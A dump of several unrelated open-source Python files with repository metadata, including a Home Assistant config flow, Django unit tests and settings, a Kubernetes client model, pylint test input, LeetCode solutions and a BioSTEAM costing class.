select_schema = vol.Schema({vol.Required("select_ip"): vol.In(self._ips)})
return self.async_show_form(step_id="select", data_schema=select_schema)
async def async_step_connect(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Connect to the Motion Gateway."""
errors: dict[str, str] = {}
if user_input is not None:
key = user_input[CONF_API_KEY]
connect_gateway_class = ConnectMotionGateway(self.hass)
if not await connect_gateway_class.async_connect_gateway(self._host, key):
return self.async_abort(reason="connection_error")
motion_gateway = connect_gateway_class.gateway_device
# check socket interface
check_multicast_class = ConnectMotionGateway(
self.hass, interface=DEFAULT_INTERFACE
)
multicast_interface = await check_multicast_class.async_check_interface(
self._host, key
)
mac_address = motion_gateway.mac
await self.async_set_unique_id(mac_address, raise_on_progress=False)
self._abort_if_unique_id_configured(
updates={
CONF_HOST: self._host,
CONF_API_KEY: key,
CONF_INTERFACE: multicast_interface,
}
)
return self.async_create_entry(
title=DEFAULT_GATEWAY_NAME,
data={
CONF_HOST: self._host,
CONF_API_KEY: key,
CONF_INTERFACE: multicast_interface,
},
)
self._config_settings = vol.Schema(
{
vol.Required(CONF_API_KEY): vol.All(str, vol.Length(min=16, max=16)),
}
)
return self.async_show_form(
step_id="connect", data_schema=self._config_settings, errors=errors
)
|
[
"[email protected]"
] | |
7138157a99f990cabe7b6d92c931997d3c4c9092
|
544cfadc742536618168fc80a5bd81a35a5f2c99
|
/tools/test/connectivity/acts_tests/acts_contrib/test_utils_tests/power/tel/lab/ensure_valid_calibration_table_test.py
|
76eb4dbd4acd38d244719fc813c3d683256c7892
|
[] |
no_license
|
ZYHGOD-1/Aosp11
|
0400619993b559bf4380db2da0addfa9cccd698d
|
78a61ca023cbf1a0cecfef8b97df2b274ac3a988
|
refs/heads/main
| 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,264 |
py
|
#!/usr/bin/env python3
#
# Copyright 2019 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import mobly.config_parser as mobly_config_parser
class EnsureValidCalibrationTableTest(unittest.TestCase):
""" Unit tests for exercising the logic of ensure_valid_calibration_table
for instances of PowerCellularLabBaseTest
"""
VALID_CALIBRATION_TABLE = {'1': {'2': {'3': 123, '4': 3.14}}, '2': 45.67}
INVALID_CALIBRATION_TABLE = invalid = {'1': {'a': 'invalid'}, '2': 1234}
@classmethod
def setUpClass(self):
from acts_contrib.test_utils.power.cellular.cellular_power_base_test import PowerCellularLabBaseTest as PCBT
self.PCBT = PCBT
PCBT.log = mock.Mock()
PCBT.log_path = ''
def setUp(self):
self.tb_key = 'testbed_configs'
test_run_config = mobly_config_parser.TestRunConfig()
test_run_config.testbed_name = 'MockTestBed'
test_run_config.log_path = '/tmp'
test_run_config.summary_writer = mock.MagicMock()
test = self.PCBT(test_run_config)
self.test = test
def _assert_no_exception(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self.fail('Error thrown: {}'.format(e))
def _assert_calibration_table_passes(self, table):
self._assert_no_exception(self.test.ensure_valid_calibration_table, table)
def _assert_calibration_table_fails(self, table):
with self.assertRaises(TypeError):
self.test.ensure_valid_calibration_table(table)
def test_ensure_valid_calibration_table_passes_with_empty_table(self):
""" Ensure that empty calibration tables are invalid """
self._assert_calibration_table_passes({})
def test_ensure_valid_calibration_table_passes_with_valid_table(self):
""" Ensure that valid calibration tables throw no error """
self._assert_calibration_table_passes(self.VALID_CALIBRATION_TABLE)
def test_ensure_valid_calibration_table_fails_with_invalid_data(self):
""" Ensure that calibration tables with invalid entries throw an error """
self._assert_calibration_table_fails(self.INVALID_CALIBRATION_TABLE)
def test_ensure_valid_calibration_table_fails_with_none(self):
""" Ensure an exception is thrown if no calibration table is given """
self._assert_calibration_table_fails(None)
def test_ensure_valid_calibration_table_fails_with_invalid_type(self):
""" Ensure an exception is thrown if no calibration table is given """
self._assert_calibration_table_fails([])
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
c406c4fa44ef9faa6c952d4cf2179d081e449de0
|
e1f5ae5fb62eac4cd87eac807e57321d895a6c48
|
/boards/tests/test_view_reply_topic.py
|
508a0a252fcdcb4c189740fe6b94398761a0d94b
|
[] |
no_license
|
Abepena/django-boards
|
5c1eebce615ff41e75a32cd46ec10228f0eff6c6
|
22aa237f9f19d04ddeb2284cd8f066563d6bc1b1
|
refs/heads/master
| 2020-03-24T22:08:54.894285 | 2018-08-10T16:29:39 | 2018-08-10T16:29:51 | 143,059,179 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,474 |
py
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.urls import reverse, resolve
from ..models import Board, Topic, Post
from ..forms import PostForm
from ..views import reply_topic
class ReplyTopicTestCase(TestCase):
"""
Base Test for all other Test Cases with this page
The setUp will persist through all other Tests that inherit from this
"""
def setUp(self):
self.board = Board.objects.create(name="Django", description="Django Board")
self.username = 'john'
self.password = 'django123'
user = User.objects.create_user(username=self.username, email='[email protected]', password=self.password)
self.topic = Topic.objects.create(subject="Test", board=self.board, starter=user)
self.post = Post(message="Hello world!", topic=self.topic, created_by=user)
self.url = reverse('reply_topic', kwargs={"board_pk": self.board.pk, "topic_pk": self.topic.pk})
class LoginRequiredReplyTopicTest(ReplyTopicTestCase):
def test_redirection(self):
login_url = reverse('login')
response = self.client.get(self.url)
self.assertRedirects(response, f'{login_url}?next={self.url}')
class ReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.get(self.url)
def test_response_status_code(self):
self.assertEqual(self.response.status_code, 200)
def test_view_function(self):
view = resolve('/boards/1/topics/1/reply/')
self.assertEqual(view.func, reply_topic)
def test_contains_form(self):
form = self.response.context.get("form")
self.assertIsInstance(form, PostForm)
def test_csrf(self):
self.assertContains(self.response, "csrfmiddlewaretoken")
def test_form_inputs(self):
"""
form should have 2 inputs, 1 hidden csrf 1 message
"""
self.assertContains(self.response, "<input", 1)
self.assertContains(self.response, "<textarea", 1)
class SuccessfulReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.post(self.url, data={"message":"Hello"})
def test_redirection(self):
url = reverse('topic_posts', kwargs={
"board_pk": self.board.pk,
"topic_pk": self.topic.pk
})
topic_posts_url= "{url}?page=1#2".format(url=url)
self.assertRedirects(self.response, topic_posts_url)
def test_reply_created(self):
"""
total posts created should be 2, one in the setup of the ReplyTopicTestCase
another in the data passed in within this TestCase
"""
self.assertTrue(Post.objects.count(), 2)
class InvalidReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.post(self.url, data={})
def test_response_status_code(self):
"""
Invalid data should just show the reply_topic view again and not redirect
"""
self.assertEqual(self.response.status_code, 200)
def test_form_errors(self):
form = self.response.context.get("form")
self.assertTrue(form.errors)
|
[
"[email protected]"
] | |
3101499783426029239417ff8d62a287c447d05e
|
58a4e136b6759d9cc81a895dae6f536c6a125ecf
|
/poorsmantwitter/wsgi.py
|
92942c392dc65bd30a1716de81dcc46d4c255c6d
|
[] |
no_license
|
JohnnyFang/django-api-vuejs
|
d833866a1b86757ed7b6301984f70f39a1cadfae
|
80edc54740f46866cc938d1a5d190d71110711ad
|
refs/heads/master
| 2020-03-29T04:31:47.018835 | 2018-09-20T02:06:03 | 2018-09-20T02:06:03 | 149,535,361 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 407 |
py
|
"""
WSGI config for poorsmantwitter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'poorsmantwitter.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
88fdacb8b8fd7a0424e1685a2102d2689d162abd
|
232b2e8881a4ba693bea940022d68cc22caeccbb
|
/virtual/lib/python3.6/site-packages/pylint/test/input/func_block_disable_msg.py
|
5ed690ebfd0ad61e819ce5be60262d24f8c1f576
|
[
"MIT"
] |
permissive
|
bryomajor/my-developer-life
|
b52ea3cd39e5d8226c51c700da32f5daf2489dc7
|
8332e1da4d24511255b1b7fc02f94ae4352f87a1
|
refs/heads/master
| 2022-12-08T08:18:40.266324 | 2019-10-29T13:40:44 | 2019-10-29T13:40:44 | 217,529,308 | 1 | 2 |
MIT
| 2022-12-08T06:47:28 | 2019-10-25T12:31:00 |
Python
|
UTF-8
|
Python
| false | false | 4,722 |
py
|
# pylint: disable=C0302,bare-except,print-statement
"""pylint option block-disable"""
from __future__ import print_function
class Foo(object):
"""block-disable test"""
def __init__(self):
self._test = "42"
def meth1(self, arg):
"""this issues a message"""
print(self)
def meth2(self, arg):
"""and this one not"""
# pylint: disable=W0613
print(self._test\
+ "foo")
def meth3(self):
"""test one line disabling"""
# no error
print(self.bla) # pylint: disable=E1101
# error
print(self.blop)
def meth4(self):
"""test re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blop)
# pylint: enable=E1101
# error
print(self.blip)
def meth5(self):
"""test IF sub-block re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
if self.blop:
# pylint: enable=E1101
# error
print(self.blip)
else:
# no error
print(self.blip)
# no error
print(self.blip)
def meth6(self):
"""test TRY/EXCEPT sub-block re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
try:
# pylint: enable=E1101
# error
print(self.blip)
except UndefinedName: # pylint: disable=E0602
# no error
print(self.blip)
# no error
print(self.blip)
def meth7(self):
"""test one line block opening disabling"""
if self.blop: # pylint: disable=E1101
# error
print(self.blip)
else:
# error
print(self.blip)
# error
print(self.blip)
def meth8(self):
"""test late disabling"""
# error
print(self.blip)
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blop)
def meth9(self):
"""test re-enabling right after a block with whitespace"""
eris = 5
if eris: # pylint: disable=using-constant-test
print("In block")
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blu)
# pylint: enable=E1101
# error
print(self.blip)
def meth10(self):
"""Test double disable"""
# pylint: disable=E1101
# no error
print(self.bla)
# pylint: disable=E1101
print(self.blu)
class ClassLevelMessage(object):
"""shouldn't display to much attributes/not enough methods messages
"""
# pylint: disable=R0902,R0903
def __init__(self):
self.attr1 = 1
self.attr2 = 1
self.attr3 = 1
self.attr4 = 1
self.attr5 = 1
self.attr6 = 1
self.attr7 = 1
self.attr8 = 1
self.attr9 = 1
self.attr0 = 1
def too_complex_but_thats_ok(self, attr1, attr2):
"""THIS Method has too much branches and returns but i don't care
"""
# pylint: disable=R0912,R0911
try:
attr3 = attr1+attr2
except ValueError:
attr3 = None
except:
return 'duh', self
if attr1:
for i in attr1:
if attr2:
return i
else:
return 'duh'
elif attr2:
for i in attr2:
if attr2:
return i
else:
return 'duh'
else:
for i in range(15):
if attr3:
return i
else:
return 'doh'
return None
print('hop, too many lines but i don\'t care')
|
[
"[email protected]"
] | |
618b82c84c0b4bb643b5a6a82e5c9447552a00b4
|
fd3b242c83a65edb85d3ad27c67172109fb5b0db
|
/venv/lib/python2.7/site-packages/kubernetes/client/models/v1_cinder_persistent_volume_source.py
|
73bcff8a2e312ac36248a78ca6ce04aeb15a998b
|
[] |
no_license
|
mainak90/hvac-openshift-feeder
|
a0946d89bd79e19881113effe3305499d80df4a8
|
730689dd7feca354fc09dabe3510333c9557e979
|
refs/heads/master
| 2020-12-08T07:39:58.125243 | 2020-04-26T19:49:40 | 2020-04-26T19:49:40 | 232,927,203 | 1 | 0 | null | 2020-01-09T23:45:08 | 2020-01-09T23:37:41 |
Python
|
UTF-8
|
Python
| false | false | 6,790 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1CinderPersistentVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'read_only': 'bool',
'secret_ref': 'V1SecretReference',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'read_only': 'readOnly',
'secret_ref': 'secretRef',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, read_only=None, secret_ref=None, volume_id=None):
"""
V1CinderPersistentVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._read_only = None
self._secret_ref = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if read_only is not None:
self.read_only = read_only
if secret_ref is not None:
self.secret_ref = secret_ref
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1CinderPersistentVolumeSource.
Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The fs_type of this V1CinderPersistentVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1CinderPersistentVolumeSource.
Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param fs_type: The fs_type of this V1CinderPersistentVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1CinderPersistentVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The read_only of this V1CinderPersistentVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1CinderPersistentVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param read_only: The read_only of this V1CinderPersistentVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def secret_ref(self):
"""
Gets the secret_ref of this V1CinderPersistentVolumeSource.
Optional: points to a secret object containing parameters used to connect to OpenStack.
:return: The secret_ref of this V1CinderPersistentVolumeSource.
:rtype: V1SecretReference
"""
return self._secret_ref
@secret_ref.setter
def secret_ref(self, secret_ref):
"""
Sets the secret_ref of this V1CinderPersistentVolumeSource.
Optional: points to a secret object containing parameters used to connect to OpenStack.
:param secret_ref: The secret_ref of this V1CinderPersistentVolumeSource.
:type: V1SecretReference
"""
self._secret_ref = secret_ref
@property
def volume_id(self):
"""
Gets the volume_id of this V1CinderPersistentVolumeSource.
volume id used to identify the volume in cinder More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The volume_id of this V1CinderPersistentVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1CinderPersistentVolumeSource.
volume id used to identify the volume in cinder More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param volume_id: The volume_id of this V1CinderPersistentVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1CinderPersistentVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"[email protected]"
] | |
eeaecaef2aa86b78b91e226879df507b600fbaa2
|
e28009b0a4584e8d128ed6fbd4ba84a1db11d1b9
|
/724.Find Pivot Index/724.Find Pivot Index.py
|
e2f3a7351cebe7b37a64abc1530fec85170e3a81
|
[] |
no_license
|
jerrylance/LeetCode
|
509d16e4285296167feb51a80d6c382b3833405e
|
06ed3e9b27a3f1c0c517710d57fbbd794fd83e45
|
refs/heads/master
| 2020-12-02T23:10:27.382142 | 2020-08-02T02:03:54 | 2020-08-02T02:03:54 | 231,141,551 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,126 |
py
|
# LeetCode Solution
# Zeyu Liu
# 2019.3.25
# 724.Find Pivot Index
from typing import List
# method 1 slice切片遍历,极慢
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
for i in range(len(nums)):
if sum(nums[:i]) == sum(nums[i+1:]):
return i
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
# method 2 straightforward O(N) time O(1) space
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
left = 0
right = sum(nums)
for i in range(len(nums)):
right -= nums[i]
if left == right:
return i
left += nums[i]
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
# method 3 方法1优化,依然很慢
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
s = sum(nums) / 2
for i in range(len(nums)):
if sum(nums[:i])+nums[i]/2 == s:
return i
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
|
[
"[email protected]"
] | |
a4339549ff121a3716ac714438184f983ddea0d6
|
33da2094a944e4333ea76b04c3c6078cf643b1dc
|
/tyler_crowdboticstest_155/settings.py
|
3d7ce2c30ec2503a84c8fca167abba0fe7ab3ab5
|
[] |
no_license
|
TylerCrowdboticsTest/tyler-crowdboticstest-155
|
3f72a9e63f63d827379bf709b2baf6b3776113e6
|
cc063c566acf36c353a4129ab21ff265d75fb163
|
refs/heads/master
| 2020-03-22T04:12:50.631988 | 2018-07-02T18:47:42 | 2018-07-02T18:47:42 | 139,481,489 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,143 |
py
|
"""
Django settings for tyler_crowdboticstest_155 project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5sopo74xvgupkgmc&3=)f3p4nqs_78d8m+7^k5fsda@ll8y-04'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tyler_crowdboticstest_155.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tyler_crowdboticstest_155.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
import environ
env = environ.Env()
ALLOWED_HOSTS = ['*']
SITE_ID = 1
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
DATABASES = {
'default': env.db()
}
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
LOCAL_APPS = [
'home',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
# allauth
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = None
LOGIN_REDIRECT_URL = '/'
|
[
"[email protected]"
] | |
1c0a5d1b35fec3aea62c94f8bbf9b9c3a2720fbb
|
9719df2dc131aa1189acef7273bee090290becd6
|
/Chapter 11/E6.py
|
e4dd52107ac0dc81baf55df8f39f90d0cbb908ec
|
[
"MIT"
] |
permissive
|
hanzhi713/thinkcs-python3-solutions
|
df72e9d76779a5ffb9a8f9a9316c672a021feece
|
290b34df7d9c7f45daebd1af6017a03828ec8eb4
|
refs/heads/master
| 2020-03-31T10:03:03.301775 | 2018-10-08T17:41:10 | 2018-10-08T17:41:10 | 152,120,690 | 13 | 7 | null | null | null | null |
UTF-8
|
Python
| false | false | 137 |
py
|
def scalar_mult(s, v):
resul = []
for item in v:
resul.append(item * s)
return resul
print(scalar_mult(5, [1, 2]))
|
[
"[email protected]"
] | |
0f3add105d1072828de995c41fe4f79d5c9ec94f
|
4d330238c7eb97fac95f3674ab4ddb5114fdf3d7
|
/biosteam/units/auxiliary.py
|
f446902fd6363ba65c9a0adae2cd4ba9307fa988
|
[
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"MIT"
] |
permissive
|
BioSTEAMDevelopmentGroup/biosteam
|
d064c7d5a16d79a966caa68ed3f4cca089f9c49c
|
0501214b7e7fb16b89d1e45c94938b0e08b1331f
|
refs/heads/master
| 2023-08-20T04:47:10.816994 | 2023-08-12T19:22:20 | 2023-08-12T19:22:20 | 164,639,830 | 115 | 29 |
NOASSERTION
| 2023-06-10T15:56:37 | 2019-01-08T12:02:16 |
Python
|
UTF-8
|
Python
| false | false | 4,071 |
py
|
# -*- coding: utf-8 -*-
"""
This module contains functions for adding auxliary unit operations.
"""
import biosteam as bst
__all__ = ('Auxiliary',)
class Auxiliary:
"""Abstract class for light-weight auxiliary unit. The class should
compute all results during initialization."""
__slots__ = (
'owner',
'auxname',
'auxiliary_units',
'power_utility',
'heat_utilities',
'baseline_purchase_costs',
'purchase_costs',
'installed_costs',
'F_M', 'F_D', 'F_P', 'F_BM',
)
add_power_utility = bst.Unit.add_power_utility
add_heat_utility = bst.Unit.add_heat_utility
create_heat_utility = bst.Unit.create_heat_utility
def __init__(self):
self.power_utility = bst.PowerUtility()
self.heat_utilities = []
self.baseline_purchase_costs = {}
self.purchase_costs = {}
self.installed_costs = {}
self.F_M = {}
self.F_D = {}
self.F_P = {}
self.F_BM = {}
def _setup(self):
results = (self.baseline_purchase_costs, self.purchase_costs,
self.installed_costs, self.F_M, self.F_D, self.F_P,
self.F_BM)
for i in results: i.clear()
for i in self.heat_utilities: i.empty()
self.heat_utilities.clear()
self.power_utility.empty()
def _load_costs(self):
r"""
Calculate and save free on board (f.o.b.) purchase costs and
installed equipment costs (i.e. bare-module cost) for each item in the
:attr:`~Auxiliary.baseline_purchase_costs` dictionary.
Notes
-----
As explained in [1]_, the f.o.b. purchase cost is given by:
.. math::
C_{P} = C_{Pb}F_{D}F_{P}F_{M}
And the installed equipment cost is given by:
.. math::
C_{BM} = C_{Pb} (F_{BM} + F_{D}F_{P}F_{M} - 1)
Where:
* :math:`C_{Pb}`: Baseline purchase cost.
* :math:`F_{BM}`: Bare module factor.
* :math:`F_{D}`: Design factor.
* :math:`F_{P}`: Pressure factor.
* :math:`F_{M}`: Material factor.
Values for the bare-module, design, pressure, and material factors of
each equipment should be stored in the :attr:`~Auxiliary.F_BM`, :attr:`~Auxiliary.F_D`,
:attr:`~Auxiliary.F_P`, and :attr:`~Auxiliary.F_M` dictionaries.
Warning
-------
If an item is listed in the :attr:`~Auxiliary.purchase_costs` dictionary but not in the
:attr:`~Auxiliary.baseline_purchase_costs` dictionary, the baseline purchase cost is
assumed to be the same as the purchase cost.
References
----------
.. [1] Seider, W. D., Lewin, D. R., Seader, J. D., Widagdo, S., Gani, R., & Ng, M. K. (2017). Product and Process Design Principles. Wiley. Cost Accounting and Capital Cost Estimation (Chapter 16)
"""
F_BM = self.F_BM
F_D = self.F_D
F_P = self.F_P
F_M = self.F_M
baseline_purchase_costs = self.baseline_purchase_costs
purchase_costs = self.purchase_costs
installed_costs = self.installed_costs
# Load main costs
for i in purchase_costs:
if i not in baseline_purchase_costs:
baseline_purchase_costs[i] = purchase_costs[i]
for name, Cpb in baseline_purchase_costs.items():
if name in installed_costs and name in purchase_costs:
continue # Assume costs already added elsewhere using another method
F = F_D.get(name, 1.) * F_P.get(name, 1.) * F_M.get(name, 1.)
try:
installed_costs[name] = Cpb * (F_BM[name] + F - 1.)
except KeyError:
F_BM[name] = 1.
installed_costs[name] = purchase_costs[name] = Cpb * F
else:
purchase_costs[name] = Cpb * F
|
[
"[email protected]"
] | |
8d949e06450535d4290d453381f9fea6c09f6263
|
b4af26ef6994f4cbb738cdfd182e0a992d2e5baa
|
/source/leetcode/2222/hyo.py
|
c1b25c1cdff34ac62d6631e0c46197bc05b08274
|
[] |
no_license
|
wisest30/AlgoStudy
|
6819b193c8e9245104fc52df5852cd487ae7a26e
|
112de912fc10933445c2ad36ce30fd404c493ddf
|
refs/heads/master
| 2023-08-08T17:01:12.324470 | 2023-08-06T11:54:15 | 2023-08-06T11:54:15 | 246,302,438 | 10 | 17 | null | 2021-09-26T13:52:18 | 2020-03-10T13:02:56 |
C++
|
UTF-8
|
Python
| false | false | 381 |
py
|
class Solution:
def numberOfWays(self, s: str) -> int:
right_cnts = Counter(s)
left_cnts = Counter()
ret = 0
for c in s :
right_cnts[c] -= 1
if c == '0' : ret += left_cnts['1'] * right_cnts['1']
else : ret += left_cnts['0'] * right_cnts['0']
left_cnts[c] += 1
return ret
|
[
"[email protected]"
] | |
052bbab1f6d426719015437fad0b7bdf83bbc0ac
|
648e5ea6722db2f29806e24f11cf169257dfc1c7
|
/blogsadmin/migrations/0005_auto__add_field_position_group.py
|
0ad40ed7325a477fce46b6380adef8c7a5a32b72
|
[] |
no_license
|
cash2one/doorscenter
|
30d4f65e3fb57c417df3f09d7feab721d8425faa
|
d2771bf04aa187dda6d468883a5a167237589369
|
refs/heads/master
| 2021-05-27T15:38:56.219907 | 2012-06-20T05:38:15 | 2012-06-20T05:38:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,504 |
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Position.group'
db.add_column('blogsadmin_position', 'group', self.gf('django.db.models.fields.CharField')(default='', max_length=200, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Position.group'
db.delete_column('blogsadmin_position', 'group')
models = {
'blogsadmin.blog': {
'Meta': {'object_name': 'Blog'},
'backLinksCount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'bulkAddBlogs': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
